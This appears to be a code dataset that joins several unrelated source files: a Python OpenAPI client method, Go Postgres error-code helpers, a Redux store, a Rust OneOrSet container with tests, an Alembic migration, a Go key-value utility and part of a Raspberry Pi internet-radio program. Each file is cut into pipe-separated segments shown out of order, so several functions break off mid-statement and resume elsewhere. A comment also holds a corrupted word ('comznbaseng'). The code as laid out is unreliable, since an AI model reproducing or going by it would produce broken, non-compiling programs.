# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `update_path_api_v1_frontend_location_id_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/frontend/location/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Path', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| update_path_api_v1_frontend_location_id_put_with_http_info |
pgcode.go | // Copyright 2019 The Cockroach Authors.
package pgerror
import (
"strings"
"github.com/znbasedb/errors"
"github.com/znbasedb/znbase/pkg/sql/pgwire/pgcode"
)
// WithCandidateCode decorates the error with a candidate postgres
// error code. It is called "candidate" because the code is only used
// by GetPGCode() below conditionally.
// The code is considered PII-free and is thus reportable.
func WithCandidateCode(err error, code pgcode.Code) error {
if err == nil {
return nil
}
return &withCandidateCode{cause: err, code: code.String()}
}
// GetPGCodeInternal retrieves a code for the error. It operates by
// comznbaseng the inner (cause) code and the code at the current level,
// at each level of cause.
//
// - at each level:
//
// - if there is a candidate code at that level, that is used;
// - otherwise, it calls computeDefaultCode().
// if the function returns an empty string,
// UncategorizedError is used.
// An example implementation for computeDefaultCode is provided below.
//
// - after that, it combines the code computed already for the cause
// (inner) and the new code just computed at the current level (outer)
// as follows:
//
// - if the outer code is uncategorized, the inner code is kept no
// matter what.
// - if the outer code has the special XX prefix, that is kept.
// (The "XX" prefix signals importance in the pg code hierarchy.)
// - if the inner code is not uncategorized, it is retained.
// - otherwise the outer code is retained.
//
func GetPGCodeInternal(
err error, computeDefaultCode func(err error) (code pgcode.Code),
) (code pgcode.Code) {
code = pgcode.Uncategorized
if c, ok := err.(*withCandidateCode); ok {
code = pgcode.MakeCode(c.code)
} else if newCode := computeDefaultCode(err); newCode.String() != "" {
code = newCode
}
if c := errors.UnwrapOnce(err); c != nil {
innerCode := GetPGCodeInternal(c, computeDefaultCode)
code = combineCodes(innerCode, code)
}
return code
}
// ComputeDefaultCode looks at the current error object
// (not its causes) and returns:
// - the existing code for Error instances
// - SerializationFailure for roachpb retry errors that can be reported to clients
// - StatementCompletionUnknown for ambiguous commit errors
// - InternalError for assertion failures
// - FeatureNotSupportedError for unimplemented errors.
func ComputeDefaultCode(err error) pgcode.Code {
switch e := err.(type) {
// If there was already a pgcode in the cause, use that.
case *Error:
return e.Code
// Special roachpb errors get a special code.
case ClientVisibleRetryError:
return pgcode.SerializationFailure
case ClientVisibleAmbiguousError:
return pgcode.StatementCompletionUnknown
}
if errors.IsAssertionFailure(err) |
if errors.IsUnimplementedError(err) {
return pgcode.FeatureNotSupported
}
return pgcode.Code("")
}
// ClientVisibleRetryError mirrors roachpb.ClientVisibleRetryError but
// is defined here to avoid an import cycle.
type ClientVisibleRetryError interface {
ClientVisibleRetryError()
}
// ClientVisibleAmbiguousError mirrors
// roachpb.ClientVisibleAmbiguousError but is defined here to avoid an
// import cycle.
type ClientVisibleAmbiguousError interface {
ClientVisibleAmbiguousError()
}
// combineCodes combines the inner and outer codes.
func combineCodes(innerCode, outerCode pgcode.Code) pgcode.Code {
if outerCode == pgcode.Uncategorized {
return innerCode
}
if strings.HasPrefix(outerCode.String(), "XX") {
return outerCode
}
if innerCode != pgcode.Uncategorized {
return innerCode
}
return outerCode
}
| {
return pgcode.Internal
} |
store.js | import { configureStore } from '@reduxjs/toolkit';
import { userSlice } from '../features/userSlice';
import toastReducer from '../features/toastSlice';
import { danceSlice } from '../features/danceSlice';
import { planSlice } from '../features/planSlice';
export default configureStore({
reducer: {
user: userSlice.reducer, | },
}); | toast: toastReducer,
dance: danceSlice.reducer,
plan: planSlice.reducer, |
one_or_set.rs | // Copyright 2020-2022 IOTA Stiftung
// SPDX-License-Identifier: Apache-2.0
use core::fmt::Debug;
use core::fmt::Formatter;
use core::hash::Hash;
use core::iter;
use core::mem::replace;
use core::ops::Deref;
use core::slice::from_ref;
use serde::de;
use serde::Deserialize;
use serde::Serialize;
use identity_diff::Diff;
use identity_diff::DiffVec;
use crate::common::KeyComparable;
use crate::common::OrderedSet;
use crate::error::Error;
use crate::error::Result;
/// A generic container that stores exactly one or more unique instances of a given type.
///
/// Similar to [`OneOrMany`](crate::common::OneOrMany) except instances are guaranteed to be unique,
/// and only immutable references are allowed.
#[derive(Clone, Hash, PartialEq, Eq, PartialOrd, Ord, Deserialize, Serialize)]
#[serde(transparent)]
pub struct OneOrSet<T>(OneOrSetInner<T>)
where
T: KeyComparable;
// Private to prevent creations of empty `Set` variants.
#[derive(Clone, Debug, Hash, PartialEq, Eq, PartialOrd, Ord, Deserialize, Serialize)]
#[serde(untagged)]
enum OneOrSetInner<T>
where
T: KeyComparable,
{
/// A single instance of `T`.
One(T),
/// Multiple (one or more) unique instances of `T`.
#[serde(deserialize_with = "deserialize_non_empty_set")]
Set(OrderedSet<T>),
}
/// Deserializes an [`OrderedSet`] while enforcing that it is non-empty.
fn deserialize_non_empty_set<'de, D, T: serde::Deserialize<'de> + KeyComparable>(
deserializer: D,
) -> Result<OrderedSet<T>, D::Error>
where
D: de::Deserializer<'de>,
{
let set: OrderedSet<T> = OrderedSet::deserialize(deserializer)?;
if set.is_empty() {
return Err(de::Error::custom(Error::OneOrSetEmpty));
}
Ok(set)
}
impl<T> OneOrSet<T>
where
T: KeyComparable,
{
/// Constructs a new instance with a single item.
pub fn new_one(item: T) -> Self {
Self(OneOrSetInner::One(item))
}
/// Constructs a new instance from a set of unique items.
///
/// Errors if the given set is empty.
pub fn new_set(set: OrderedSet<T>) -> Result<Self> {
if set.is_empty() {
return Err(Error::OneOrSetEmpty);
}
if set.len() == 1 {
Ok(Self::new_one(
set.into_vec().pop().expect("infallible OneOrSet new_set"),
))
} else {
Ok(Self(OneOrSetInner::Set(set)))
}
}
/// Apply a map function to convert this into a new `OneOrSet<S>`.
pub fn map<S, F>(self, mut f: F) -> OneOrSet<S>
where
S: KeyComparable,
F: FnMut(T) -> S,
{
OneOrSet(match self.0 {
OneOrSetInner::One(item) => OneOrSetInner::One(f(item)),
OneOrSetInner::Set(set_t) => {
let set_s: OrderedSet<S> = set_t.into_vec().into_iter().map(f).collect();
// Key equivalence could differ between T and S.
if set_s.len() == 1 {
OneOrSetInner::One(set_s.into_vec().pop().expect("OneOrSet::map infallible"))
} else {
OneOrSetInner::Set(set_s)
}
}
})
}
/// Apply a map function to convert this into a new `OneOrSet<S>`.
pub fn try_map<S, F, E>(self, mut f: F) -> Result<OneOrSet<S>, E>
where
S: KeyComparable,
F: FnMut(T) -> Result<S, E>,
{
Ok(OneOrSet(match self.0 {
OneOrSetInner::One(item) => OneOrSetInner::One(f(item)?),
OneOrSetInner::Set(set_t) => {
let set_s: OrderedSet<S> = set_t
.into_vec()
.into_iter()
.map(f)
.collect::<Result<OrderedSet<S>, E>>()?;
// Key equivalence could differ between T and S.
if set_s.len() == 1 {
OneOrSetInner::One(set_s.into_vec().pop().expect("OneOrSet::try_map infallible"))
} else {
OneOrSetInner::Set(set_s)
}
}
}))
}
/// Returns the number of elements in the collection.
#[allow(clippy::len_without_is_empty)]
pub fn len(&self) -> usize {
match &self.0 {
OneOrSetInner::One(_) => 1,
OneOrSetInner::Set(inner) => inner.len(),
}
}
/// Returns a reference to the element at the given index.
pub fn get(&self, index: usize) -> Option<&T> {
match &self.0 {
OneOrSetInner::One(inner) if index == 0 => Some(inner),
OneOrSetInner::One(_) => None,
OneOrSetInner::Set(inner) => inner.get(index),
}
}
/// Returns `true` if the collection contains the given item's key.
pub fn contains<U>(&self, item: &U) -> bool
where
T: KeyComparable,
U: KeyComparable<Key = T::Key>,
{
match &self.0 {
OneOrSetInner::One(inner) => inner.key() == item.key(),
OneOrSetInner::Set(inner) => inner.contains(item),
}
}
/// Appends a new item to the end of the collection if its key is not present already.
///
/// Returns whether or not the value was successfully inserted.
pub fn append(&mut self, item: T) -> bool
where
T: KeyComparable,
{
match &mut self.0 {
OneOrSetInner::One(inner) if inner.key() == item.key() => false,
OneOrSetInner::One(_) => match replace(&mut self.0, OneOrSetInner::Set(OrderedSet::new())) {
OneOrSetInner::One(inner) => {
self.0 = OneOrSetInner::Set(OrderedSet::from_iter([inner, item].into_iter()));
true
}
OneOrSetInner::Set(_) => unreachable!(),
},
OneOrSetInner::Set(inner) => inner.append(item),
}
}
/// Returns an `Iterator` that yields items from the collection.
pub fn iter(&self) -> impl Iterator<Item = &T> + '_ {
OneOrSetIter::new(self)
}
/// Returns a reference to the contents as a slice.
pub fn as_slice(&self) -> &[T] {
&*self
}
/// Consumes the [`OneOrSet`] and returns the contents as a [`Vec`].
pub fn into_vec(self) -> Vec<T> {
match self.0 {
OneOrSetInner::One(inner) => vec![inner],
OneOrSetInner::Set(inner) => inner.into_vec(),
}
}
}
impl<T> Debug for OneOrSet<T>
where
T: Debug + KeyComparable,
{
fn fmt(&self, f: &mut Formatter<'_>) -> core::fmt::Result {
match &self.0 {
OneOrSetInner::One(inner) => Debug::fmt(inner, f),
OneOrSetInner::Set(inner) => Debug::fmt(inner, f),
}
}
}
impl<T> Deref for OneOrSet<T>
where
T: KeyComparable,
{
type Target = [T];
fn deref(&self) -> &Self::Target {
match &self.0 {
OneOrSetInner::One(inner) => from_ref(inner),
OneOrSetInner::Set(inner) => inner.as_slice(),
}
}
}
impl<T> AsRef<[T]> for OneOrSet<T>
where
T: KeyComparable,
{
fn as_ref(&self) -> &[T] {
self.as_slice()
}
}
impl<T> From<T> for OneOrSet<T>
where
T: KeyComparable,
{
fn from(other: T) -> Self {
OneOrSet::new_one(other)
}
}
impl<T> TryFrom<Vec<T>> for OneOrSet<T>
where
T: KeyComparable,
{
type Error = Error;
fn try_from(other: Vec<T>) -> std::result::Result<Self, Self::Error> {
let set: OrderedSet<T> = OrderedSet::try_from(other)?;
OneOrSet::new_set(set)
}
}
impl<T> TryFrom<OrderedSet<T>> for OneOrSet<T>
where
T: KeyComparable,
{
type Error = Error;
fn try_from(other: OrderedSet<T>) -> std::result::Result<Self, Self::Error> {
OneOrSet::new_set(other)
}
}
impl<T> From<OneOrSet<T>> for Vec<T>
where
T: KeyComparable,
{
fn from(other: OneOrSet<T>) -> Self {
other.into_vec()
}
}
impl<T> From<OneOrSet<T>> for OrderedSet<T>
where
T: KeyComparable,
{
fn from(other: OneOrSet<T>) -> Self {
match other.0 {
OneOrSetInner::One(item) => OrderedSet::from_iter(iter::once(item)),
OneOrSetInner::Set(set) => set,
}
}
}
impl<T> Diff for OneOrSet<T>
where
T: Diff + KeyComparable + Serialize + for<'de> Deserialize<'de>,
{
type Type = DiffVec<T>;
fn diff(&self, other: &Self) -> identity_diff::Result<Self::Type> {
self.clone().into_vec().diff(&other.clone().into_vec())
}
fn merge(&self, diff: Self::Type) -> identity_diff::Result<Self> {
self
.clone()
.into_vec()
.merge(diff)
.and_then(|this| Self::try_from(this).map_err(identity_diff::Error::merge))
}
fn from_diff(diff: Self::Type) -> identity_diff::Result<Self> {
Vec::from_diff(diff).and_then(|this| Self::try_from(this).map_err(identity_diff::Error::convert))
}
fn into_diff(self) -> identity_diff::Result<Self::Type> {
self.into_vec().into_diff()
}
}
// =============================================================================
// Iterator
// =============================================================================
struct OneOrSetIter<'a, T>
where
T: KeyComparable,
{
inner: &'a OneOrSet<T>,
index: usize,
}
impl<'a, T> OneOrSetIter<'a, T>
where
T: KeyComparable,
{
fn new(inner: &'a OneOrSet<T>) -> Self {
Self { inner, index: 0 }
}
}
impl<'a, T> Iterator for OneOrSetIter<'a, T>
where
T: KeyComparable,
{
type Item = &'a T;
fn next(&mut self) -> Option<Self::Item> {
self.index += 1;
self.inner.get(self.index - 1)
}
}
#[cfg(test)]
mod tests {
use crate::convert::FromJson;
use crate::convert::ToJson;
use super::*;
#[derive(Clone, Debug, PartialEq, Eq, Serialize, Deserialize)]
struct MockKeyU8(u8);
#[derive(Clone, Debug, PartialEq, Eq, Serialize, Deserialize)]
struct MockKeyBool(bool);
impl KeyComparable for MockKeyU8 {
type Key = u8;
fn key(&self) -> &Self::Key {
&self.0
}
}
impl KeyComparable for MockKeyBool {
type Key = bool;
fn key(&self) -> &Self::Key {
&self.0
}
}
#[test]
fn test_new_set() {
// VALID: non-empty set.
let ordered_set: OrderedSet<MockKeyU8> = OrderedSet::from_iter([1, 2, 3].map(MockKeyU8).into_iter());
let new_set: OneOrSet<MockKeyU8> = OneOrSet::new_set(ordered_set.clone()).unwrap();
let try_from_set: OneOrSet<MockKeyU8> = OneOrSet::try_from(ordered_set.clone()).unwrap();
assert_eq!(new_set, try_from_set);
assert_eq!(OrderedSet::from(new_set), ordered_set);
// INVALID: empty set.
let empty: OrderedSet<MockKeyU8> = OrderedSet::new();
assert!(matches!(OneOrSet::new_set(empty.clone()), Err(Error::OneOrSetEmpty)));
assert!(matches!(OneOrSet::try_from(empty), Err(Error::OneOrSetEmpty)));
}
#[test]
fn test_append_from_one() {
let mut collection: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(42));
assert_eq!(collection.len(), 1);
// Ignores duplicates.
collection.append(MockKeyU8(42));
assert_eq!(collection, OneOrSet::new_one(MockKeyU8(42)));
assert_eq!(collection.len(), 1);
// Becomes Set.
collection.append(MockKeyU8(128));
assert_eq!(
collection,
OneOrSet::new_set(OrderedSet::from_iter([42, 128].map(MockKeyU8).into_iter())).unwrap()
);
assert_eq!(collection.len(), 2);
collection.append(MockKeyU8(200));
assert_eq!(
collection,
OneOrSet::new_set(OrderedSet::from_iter([42, 128, 200].map(MockKeyU8).into_iter())).unwrap()
);
assert_eq!(collection.len(), 3);
}
#[test]
fn test_append_from_set() {
let mut collection: OneOrSet<MockKeyU8> = OneOrSet::new_set((0..42).map(MockKeyU8).collect()).unwrap();
assert_eq!(collection.len(), 42);
// Appends to end.
collection.append(MockKeyU8(42));
let expected: OneOrSet<MockKeyU8> = OneOrSet::new_set((0..=42).map(MockKeyU8).collect()).unwrap();
assert_eq!(collection, expected);
assert_eq!(collection.len(), 43);
// Ignores duplicates.
for i in 0..=42 {
collection.append(MockKeyU8(i));
assert_eq!(collection, expected);
assert_eq!(collection.len(), 43);
}
}
#[test]
fn test_contains() {
// One.
let one: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
assert!(one.contains(&1));
assert!(!one.contains(&2));
assert!(!one.contains(&3));
// Set.
let set: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
assert!(set.contains(&1));
assert!(set.contains(&2));
assert!(set.contains(&3));
assert!(!set.contains(&4));
}
#[test]
fn test_get() {
// One.
let one: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
assert_eq!(one.get(0), Some(&MockKeyU8(1)));
assert_eq!(one.get(1), None);
assert_eq!(one.get(2), None);
// Set.
let set: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
assert_eq!(set.get(0), Some(&MockKeyU8(1)));
assert_eq!(set.get(1), Some(&MockKeyU8(2)));
assert_eq!(set.get(2), Some(&MockKeyU8(3)));
assert_eq!(set.get(3), None);
}
#[test]
fn test_map() {
// One.
let one: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
let one_add: OneOrSet<MockKeyU8> = one.map(|item| MockKeyU8(item.0 + 1));
assert_eq!(one_add, OneOrSet::new_one(MockKeyU8(2)));
// Set.
let set: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
let set_add: OneOrSet<MockKeyU8> = set.map(|item| MockKeyU8(item.0 + 10));
assert_eq!(set_add, OneOrSet::new_set((11..=13).map(MockKeyU8).collect()).unwrap());
// Set reduced to one.
let set_many: OneOrSet<MockKeyU8> = OneOrSet::new_set([2, 4, 6, 8].into_iter().map(MockKeyU8).collect()).unwrap();
assert_eq!(set_many.len(), 4);
let set_bool: OneOrSet<MockKeyBool> = set_many.map(|item| MockKeyBool(item.0 % 2 == 0));
assert_eq!(set_bool, OneOrSet::new_one(MockKeyBool(true)));
assert_eq!(set_bool.0, OneOrSetInner::One(MockKeyBool(true)));
assert_eq!(set_bool.len(), 1);
}
#[test]
fn test_try_map() {
// One - OK
let one: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
let one_add: OneOrSet<MockKeyU8> = one
.try_map(|item| {
if item.key() == &1 {
Ok(MockKeyU8(item.0 + 1))
} else {
Err(Error::OneOrSetEmpty)
}
})
.unwrap();
assert_eq!(one_add, OneOrSet::new_one(MockKeyU8(2)));
// One - ERROR
let one_err: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
let result_one: Result<OneOrSet<MockKeyBool>> = one_err.try_map(|item| {
if item.key() == &1 {
Err(Error::OneOrSetEmpty)
} else {
Ok(MockKeyBool(false))
}
});
assert!(matches!(result_one, Err(Error::OneOrSetEmpty)));
// Set - OK
let set: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
let set_add: OneOrSet<MockKeyU8> = set
.try_map(|item| {
if item.key() < &4 {
Ok(MockKeyU8(item.0 + 10))
} else {
Err(Error::OneOrSetEmpty)
}
})
.unwrap();
assert_eq!(set_add, OneOrSet::new_set((11..=13).map(MockKeyU8).collect()).unwrap());
// Set - ERROR
let set_err: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
let result_set: Result<OneOrSet<MockKeyU8>> = set_err.try_map(|item| {
if item.key() < &4 {
Err(Error::OneOrSetEmpty)
} else {
Ok(MockKeyU8(item.0))
}
});
assert!(matches!(result_set, Err(Error::OneOrSetEmpty)));
// Set reduced to one - OK
let set_many: OneOrSet<MockKeyU8> = OneOrSet::new_set([2, 4, 6, 8].into_iter().map(MockKeyU8).collect()).unwrap();
assert_eq!(set_many.len(), 4);
let set_bool: OneOrSet<MockKeyBool> = set_many
.try_map(|item| { | } else {
Err(Error::OneOrSetEmpty)
}
})
.unwrap();
assert_eq!(set_bool, OneOrSet::new_one(MockKeyBool(true)));
assert_eq!(set_bool.0, OneOrSetInner::One(MockKeyBool(true)));
assert_eq!(set_bool.len(), 1);
}
#[test]
fn test_iter() {
// One.
let one: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
let mut one_iter = one.iter();
assert_eq!(one_iter.next(), Some(&MockKeyU8(1)));
assert_eq!(one_iter.next(), None);
assert_eq!(one_iter.next(), None);
// Set.
let set: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
let mut set_iter = set.iter();
assert_eq!(set_iter.next(), Some(&MockKeyU8(1)));
assert_eq!(set_iter.next(), Some(&MockKeyU8(2)));
assert_eq!(set_iter.next(), Some(&MockKeyU8(3)));
assert_eq!(set_iter.next(), None);
}
#[test]
fn test_serde() {
// VALID: one.
{
let one: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
let ser: String = one.to_json().unwrap();
let de: OneOrSet<MockKeyU8> = OneOrSet::from_json(&ser).unwrap();
assert_eq!(ser, "1");
assert_eq!(de, one);
}
// VALID: set.
{
let set: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
let ser: String = set.to_json().unwrap();
let de: OneOrSet<MockKeyU8> = OneOrSet::from_json(&ser).unwrap();
assert_eq!(ser, "[1,2,3]");
assert_eq!(de, set);
}
// INVALID: empty.
{
let empty: Result<OneOrSet<MockKeyU8>> = OneOrSet::from_json("");
assert!(empty.is_err());
let empty_set: Result<OneOrSet<MockKeyU8>> = OneOrSet::from_json("[]");
assert!(empty_set.is_err());
let empty_space: Result<OneOrSet<MockKeyU8>> = OneOrSet::from_json("[ ]");
assert!(empty_space.is_err());
}
}
} | if item.key() % 2 == 0 {
Ok(MockKeyBool(item.0 % 2 == 0)) |
7b0843b4944f_.py | """empty message
Revision ID: 7b0843b4944f
Revises: a83fe752a741
Create Date: 2016-08-08 23:12:27.138166
"""
# revision identifiers, used by Alembic.
revision = '7b0843b4944f'
down_revision = 'a83fe752a741'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('order_header',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('date_created', sa.DateTime(), nullable=True),
sa.Column('date_modified', sa.DateTime(), nullable=True),
sa.Column('title', sa.Text(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('order_line',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('date_created', sa.DateTime(), nullable=True),
sa.Column('date_modified', sa.DateTime(), nullable=True),
sa.Column('request', sa.Text(), nullable=False),
sa.Column('order_id', sa.Integer(), nullable=True),
sa.Column('order_for', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['order_for'], ['users.id'], ),
sa.ForeignKeyConstraint(['order_id'], ['order_header.id'], name='order_id_fkey'),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
| op.drop_table('order_line')
op.drop_table('order_header')
### end Alembic commands ### |
|
key_values.go | package web
import (
"container/list"
"fmt"
)
// KeyValues is an utility that helps to make the key-value pairs more comfortably.
type KeyValues map[string]interface{}
// NewKeyValues returns a new KeyValues instance.
// Example:
// keyValues := NewKeyValues(
// "key1", 1,
// "key2", "key2value",
// "key3", 1.23456
// )
func | (params ...interface{}) (*KeyValues, error) {
if len(params)%2 != 0 {
return nil, fmt.Errorf("length of key-values must be even.")
}
vp := &KeyValues{}
for i := 0; i < len(params); i += 2 {
k := params[i]
v := params[i+1]
strKey, ok := k.(string)
if !ok {
return nil, fmt.Errorf("key must be string: %v", k)
}
switch v.(type) {
case string:
vp.PutString(strKey, v.(string))
case int:
vp.PutInt(strKey, v.(int))
case float64:
vp.PutFloat(strKey, v.(float64))
case *list.List:
vp.PutList(strKey, v.(*list.List))
default:
return nil, fmt.Errorf("unknown walue type: %v", v)
}
}
return vp, nil
}
// PutString puts a key-value pair and the value's type is string.
func (vp *KeyValues) PutString(k string, v string) {
(*vp)[k] = v
}
// PutInt puts a key-value pair and the value's type is int.
func (vp *KeyValues) PutInt(k string, v int) {
(*vp)[k] = v
}
// PutFloat puts a key-value pair and the value's type is float64.
func (vp *KeyValues) PutFloat(k string, v float64) {
(*vp)[k] = v
}
// PutList puts a key-value pair and the value's type is *list.List.
func (vp *KeyValues) PutList(k string, v *list.List) {
(*vp)[k] = v
}
// GetKeys returns the keys the KeyValues object.
func (vp *KeyValues) GetKeys() []string {
result := []string{}
for k := range *vp {
result = append(result, k)
}
return result
}
// Get the value by key.
func (vp *KeyValues) Get(k string) (interface{}, error) {
v, ok := (*vp)[k]
if ok {
return v, nil
}
return v, fmt.Errorf("can't find key: %s", k)
}
// GetAsString gets the value by key and convert the value to the string type,
// it will return an error if convert failed.
func (vp *KeyValues) GetAsString(k string) (string, error) {
v, err := vp.Get(k)
if err != nil {
return "", err
}
switch v.(type) {
case string:
s, _ := v.(string)
return s, nil
case int:
i, _ := v.(int)
return fmt.Sprintf("%d", i), nil
case float64:
f, _ := v.(float64)
return fmt.Sprintf("%f", f), nil
}
return "", fmt.Errorf("GetAsString: invalid walue type. key=%s", k)
}
// GetAsList gets the value by key and convert the value to the *list.List type,
// it will return an error if convert failed.
func (vp *KeyValues) GetAsList(k string) (*list.List, error) {
v, err := vp.Get(k)
if err != nil {
return nil, err
}
l, ok := v.(*list.List)
if !ok {
return nil, fmt.Errorf("GetAsList: invalid value type. key=%s", k)
}
return l, nil
}
| NewKeyValues |
piradio.go | package main
import (
"bufio"
"errors"
"flag"
"fmt"
"io"
"io/ioutil"
"net"
"net/http"
"os"
"os/exec"
"os/signal"
"os/user"
"path/filepath"
"regexp"
"strconv"
"strings"
"sync"
"syscall"
"time"
"github.com/aluedtke7/piradio/debouncer"
"github.com/aluedtke7/piradio/display"
"github.com/aluedtke7/piradio/lcd"
"github.com/aluedtke7/piradio/oled"
"github.com/antigloss/go/logger"
"periph.io/x/periph/conn/gpio"
"periph.io/x/periph/conn/gpio/gpioreg"
"periph.io/x/periph/host"
)
const (
debounceTime = 100
debounceWriteToFileTime = 15
defVolumeAnalog = "55"
defVolumeBluetooth = "35"
)
var (
disp display.Display
readyForMplayer bool
bluetoothConnected bool
debug *bool
camelCasePtr *bool
noisePtr *bool
oledPtr *bool
noBluetoothPtr *bool
backlightOffPtr *bool
backlightOffTimePtr *int
scrollStationPtr *bool
lcdDelayPtr *int
scrollSpeedPtr *int
stations []radioStation
stationIdx = -1
btDevices []string
bitrate string
volume string
volumeAnalog string
volumeBluetooth string
muted bool
charsPerLine int
command *exec.Cmd
inPipe io.WriteCloser
outPipe io.ReadCloser
pipeChan = make(chan io.ReadCloser)
ipAddress string
homePath string
currentStation string
debounceWrite func(f func())
debounceBacklight func(f func())
stationMutex = &sync.Mutex{}
charMap = map[string]string{"'": "'", "´": "'", "á": "a", "é": "e", "ê": "e", "è": "e", "í": "i", "à": "a",
"ä": "ae", "Ä": "Ae", "ö": "oe", "Ö": "Oe", "ü": "ue", "Ü": "Ue", "ß": "ss", "…": "...", "Ó": "O", "ó": "o",
"õ": "o", "ñ": "n", "ó": "o", "ø": "o", "É": "E"}
)
// holds a Radio Station name and url
type radioStation struct {
name string
url string
}
// helper for error checking
func check(err error) {
if err != nil {
logger.Error(err.Error())
logger.Error(errors.Unwrap(fmt.Errorf("Wrapped error: %w", err)).Error())
}
}
// logs the ipv4 addresses found and stores the first non localhost addresses in variable 'ipAddress'
func logNetworkInterfaces() {
interfaces, err := net.Interfaces()
if err != nil {
logger.Error(err.Error())
return
}
reg := regexp.MustCompile("^((25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])")
for _, i := range interfaces {
byName, err := net.InterfaceByName(i.Name)
if err != nil {
logger.Warn(err.Error())
}
err = nil
addresses, err := byName.Addrs()
for _, v := range addresses {
ipv4 := v.String()
if reg.MatchString(ipv4) {
logger.Trace(ipv4)
if strings.Index(ipv4, "127.0.") != 0 {
idx := strings.Index(ipv4, "/")
if idx > 0 {
ipAddress = ipv4[0:idx]
} else {
ipAddress = ipv4
}
}
}
}
}
}
// checks if a given string contains only lowercase or special characters. Is used for the conversion to camel case.
// Lowercase strings will not be 'camel-cased'.
func isOnlyLowerCase(text string) bool {
const chars = "0123456789abcdefghijklmnopqrstuvwxyz.+-*/%&!# _,;:()[]{}"
for _, c := range text {
if !strings.Contains(chars, string(c)) {
return false
}
}
return true
}
// removes characters/runes that cannot be displayed on the LCD/OLED. These displays can only display ascii characters.
// Via the 'charMap' the best possible translation is made. When the flag 'camelCase' is set to true, all non-only
// lowercase strings will be converted to camel case format.
func beautify(text string) string {
var b strings.Builder
for _, runeValue := range text {
s := charMap[string(runeValue)]
if s == "" {
if runeValue < 32 || runeValue > 126 {
logger.Trace("Illegal rune:", runeValue, string(runeValue))
} else {
b.WriteRune(runeValue)
}
} else {
b.WriteString(s)
}
}
text = b.String()
if *camelCasePtr {
if !isOnlyLowerCase(text) {
cct := strings.Title(strings.ToLower(text))
idx := strings.Index(cct, "'")
if idx > 0 && idx < len(cct)-1 {
cct = cct[:idx+1] + strings.ToLower(string(cct[idx+1])) + cct[idx+2:]
}
return cct
}
}
return text
}
func printLine(line int, text string, scroll bool, doNotBeautify ...bool) {
t := strings.TrimSpace(text)
if len(doNotBeautify) < 1 {
t = beautify(t)
}
if line == 2 && *noisePtr {
t = removeNoise(t)
}
disp.PrintLine(line, t, scroll)
}
func fileExists(name string) bool {
if _, err := os.Stat(name); err != nil {
if os.IsNotExist(err) {
return false
}
}
return true
}
func getHomeDir() string {
usr, err := user.Current()
if err != nil {
return "~/"
}
return usr.HomeDir
}
// returns the index of the last used station and the volume levels
func getStationAndVolumes() (idx int, volAnalog string, volBt string) {
fileName := filepath.Join(homePath, "last_values")
content, err := ioutil.ReadFile(fileName)
if err != nil {
idx = 0
volAnalog = defVolumeAnalog
volBt = defVolumeBluetooth
} else {
contentArr := strings.Split(strings.Trim(string(content), " "), "\n")
if len(contentArr) > 0 {
idx, err = strconv.Atoi(contentArr[0])
}
if len(contentArr) > 1 && len(contentArr[1]) > 0 {
volAnalog = contentArr[1]
} else {
volAnalog = defVolumeAnalog
}
if len(contentArr) > 2 && len(contentArr[2]) > 0 {
volBt = contentArr[2]
} else {
volBt = defVolumeBluetooth
}
}
logger.Trace("getStationAndVolumes: %d %s %s", idx, volAnalog, volBt)
return idx - 1, volAnalog, volBt
}
// saves the index of the actual station index and the volumes levels
func saveStationAndVolumes() {
fileName := filepath.Join(homePath, "last_values")
var s = strconv.Itoa(stationIdx) + "\n" + volumeAnalog + "\n" + volumeBluetooth
err := ioutil.WriteFile(fileName, []byte(s), 0644)
if err != nil {
logger.Warn("Error writing file %s : %s", fileName, err)
}
logger.Trace("saveStationAndVolumes: %d %s %s", stationIdx, volumeAnalog, volumeBluetooth)
}
// loads the list with radio stations or creates a default list
